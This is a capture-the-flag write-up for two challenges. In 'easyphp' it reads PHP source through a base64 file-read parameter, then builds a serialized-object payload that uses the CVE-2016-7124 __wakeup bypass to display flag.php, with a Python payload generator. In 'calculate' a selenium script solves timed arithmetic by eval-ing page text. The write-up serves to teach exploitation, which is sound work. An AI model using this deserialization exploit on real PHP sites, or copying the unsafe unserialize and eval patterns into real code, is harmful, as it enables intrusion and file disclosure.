1.easyphp
1.1. Title Description
The challenge page shows only a single image that fails to load.
Viewing the page source reveals one line:
<img src="show.php?img=aGludC5qcGc=" width="100%"/>
Opening the image link directly takes us to show.php with the same img parameter.
The img parameter looks like base64; decoding it confirms this and gives hint.jpg.
Trying flag.jpg and flag.php as the img value (base64-encoded) returns nothing useful.
Visiting index.php or show.php directly shows nothing either, so the next step is to use the img parameter to read the source of the two PHP files:
index.php base64-encoded is aW5kZXgucGhw
show.php base64-encoded is c2hvdy5waHA=
Both requests return the source. The contents are as follows:
index.php
<?php
require_once('hint.php');
$x = new hint();
isset($_GET['class']) && $g = $_GET['class'];
if (!empty($g)) {
    $x = unserialize($g);
    echo $x;
}
?>
<img src="show.php?img=aGludC5qcGc=" width="100%"/>
show.php
<?php
$f = $_GET['img'];
if (!empty($f)) {
    $f = base64_decode($f);
    if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE && stripos($f,'flag')===FALSE) {
        readfile($f);
    } else {
        echo "File not found!";
    }
}
?>
index.php includes hint.php, so we read that file the same way:
hint.php base64-encoded is aGludC5waHA=
hint.php
<?php
error_reporting(0);
//flag is in flag.php
class hint{
    public $file='';
    function __destruct(){
        if(!empty($this->file)) {
            if(strchr($this->file,"\\")===false && strchr($this->file,'/')===false)
                show_source(dirname(__FILE__).'/'.$this->file);
            else
                die('Wrong filename.');
        }
    }
    function __wakeup(){
        $this->file='index.php';
    }
    public function __toString(){return '';}
}
?>
1.2. Code audit
hint.php tells us the flag is in flag.php, so that is the file we need to read.
show.php filters the decoded path with stripos(): anything containing '..', '/', '\' or 'flag' (case-insensitive) is rejected, so flag.php cannot be read through show.php.
hint.php defines a class hint whose __destruct() calls show_source(dirname(__FILE__).'/'.$this->file). The only restriction on $file is that it contains no '/' or '\', which is enough to display any PHP file in the same directory as hint.php, including flag.php.
index.php passes the class GET parameter straight to unserialize(), so we can supply a serialized hint object whose file property is flag.php; when the object is destroyed at the end of the request, __destruct() prints the file.
1.3.Payload construction
Copy hint.php locally, append the following lines and run it to obtain the serialized string:
$x = new hint();
$x->file = "flag.php";
echo serialize($x);
O:4:"hint":1:{s:4:"file";s:8:"flag.php";}
The meaning of the serialized format is explained at: https://www.cnblogs.com/dogecheng/p/11652022.html
According to index.php we only need to pass this string as the class parameter, but doing so does not return the flag.
The reason is that unserialize() calls __wakeup() on the restored object, and __wakeup() resets file to index.php, so __destruct() shows index.php instead of flag.php.
We need to bypass __wakeup(). The bypass is simple: when the property count declared in the serialized string is larger than the number of properties actually present, PHP skips __wakeup(). This is CVE-2016-7124; it only works on PHP before 5.6.25 / 7.0.10, where patched versions make unserialize() return false instead.
Our original serialized string:
O:4:"hint":1:{s:4:"file";s:8:"flag.php";}
We only need to raise the declared count above the real number of properties:
O:4:"hint":2:{s:4:"file";s:8:"flag.php";}
Resubmitting the request with this string as the class parameter returns the flag.
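The steps above (base64 for the img parameter, the show.php filter, and the serialized hint object with an inflated property count) as one added Python helper. This is example code written for this write-up, not part of the challenge or the original solution; the function names (img_param, show_php_allows, php_serialize_hint, class_param) are my own, and the filter is a re-implementation of show.php's stripos() checks, not the server's code.

```python
import base64
from urllib.parse import quote


def img_param(filename):
    """Build the value show.php expects in ?img=: base64 of the path."""
    return base64.b64encode(filename.encode()).decode()


def show_php_allows(filename):
    """Re-implement the stripos() checks from show.php: the decoded path must
    not contain '..', '/', '\\' or 'flag'.  stripos is case-insensitive, so
    FLAG.php is rejected as well."""
    lowered = filename.lower()
    return not any(bad in lowered for bad in ("..", "/", "\\", "flag"))


def php_serialize_hint(file, declared_count=None):
    """Serialize a hint object with a single public property $file in PHP's
    format (O:<len>:"<class>":<count>:{s:<len>:"<prop>";s:<len>:"<value>";}).
    String lengths are byte lengths, as PHP counts them.  declared_count
    overrides the property count written into the string; a value larger than
    the real count (1) is what makes unpatched PHP skip __wakeup()."""
    count = 1 if declared_count is None else declared_count
    return 'O:4:"hint":%d:{s:4:"file";s:%d:"%s";}' % (
        count, len(file.encode()), file)


def class_param(file, bypass_wakeup=True):
    """URL-encoded value for index.php?class=... (quotes, colons and braces
    must be percent-encoded or the query string is mangled)."""
    payload = php_serialize_hint(file, 2 if bypass_wakeup else None)
    return quote(payload, safe="")


if __name__ == "__main__":
    for name in ("hint.jpg", "index.php", "show.php", "hint.php", "flag.php"):
        print("%-10s img=%-16s readable via show.php=%s"
              % (name, img_param(name), show_php_allows(name)))
    print(php_serialize_hint("flag.php"))       # __wakeup() runs, shows index.php
    print(php_serialize_hint("flag.php", 2))    # __wakeup() skipped on old PHP
    print("index.php?class=" + class_param("flag.php"))
```

The declared-count trick is the only part that depends on the PHP version; everything else (the filter bypass by using a different file-reading sink, and the serialized object itself) works regardless.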
2.calculate
2.1. Title Description
The challenge asks us to answer 10 arithmetic questions. Testing shows that each question must be answered correctly within three seconds; a wrong answer or a timeout resets the count of correct answers to zero, and there is an interval of about 1 second between one answer and the next question.
The page source is below. The expression is spread over div elements, one character per div:
<h1>calculate</h1>
<p>Answer the questions for 10 times and you can get flag.</p>
<p> You Have answered 0 questions;</p>
<form action="" method="post">
<div style="display:inline;color:#499E86">6</div><div style="display:inline;color:#BC2109">1</div><div style="display:inline;color:#E20AAD">5</div><div style="display:inline;color:#AE2893">+</div>
<div style="display:inline;color:#A3A7DA">9</div><div style="display:inline;color:#72311C">9</div><div style="display:inline;color:#7D99E9">7</div><div style="display:inline;color:#3DB475">+</div>
<div style="display:inline;color:#2144AE">6</div><div style="display:inline;color:#8523C0">1</div><div style="display:inline;color:#D42154">5</div><div style="display:inline;color:#DD166F">*</div>
<div style="display:inline;color:#0ADBF4">9</div><div style="display:inline;color:#116660">9</div><div style="display:inline;color:#4F6723">7</div><div style="display:inline;color:#7F7A0D">=</div>
<input type="text" name="ans"> <input type="submit" value="send!">
</form>
2.2. Scripting
I first tried the Python requests library without success; switching to selenium worked. The code is as follows:
from selenium import webdriver
from selenium.webdriver.common.by import By
from bs4 import BeautifulSoup
import time

driver = webdriver.Firefox()
driver.get("http://****:13002/")

def submit(driver):
    # get the page source
    source = driver.page_source
    # parse it with BeautifulSoup
    soup = BeautifulSoup(source, "lxml")
    all_div = soup.find_all(name="div")
    # rebuild the expression from the one-character divs
    s = ""
    for i in all_div:
        s = s + i.contents[0]
    # drop the trailing '='
    s = s[:-1]
    print(s)
    # compute the answer (eval trusts whatever the page put in the divs)
    res = eval(s)
    # type the answer into the form
    element = driver.find_element(By.NAME, "ans")
    element.send_keys(str(res))
    # wait 1.1 seconds for the required interval
    time.sleep(1.1)
    # submit the answer
    driver.find_element(By.XPATH, "/html/body/form/input[2]").click()
    print("click")

for i in range(10):
    submit(driver)
After answering all 10 questions the flag appears on the page.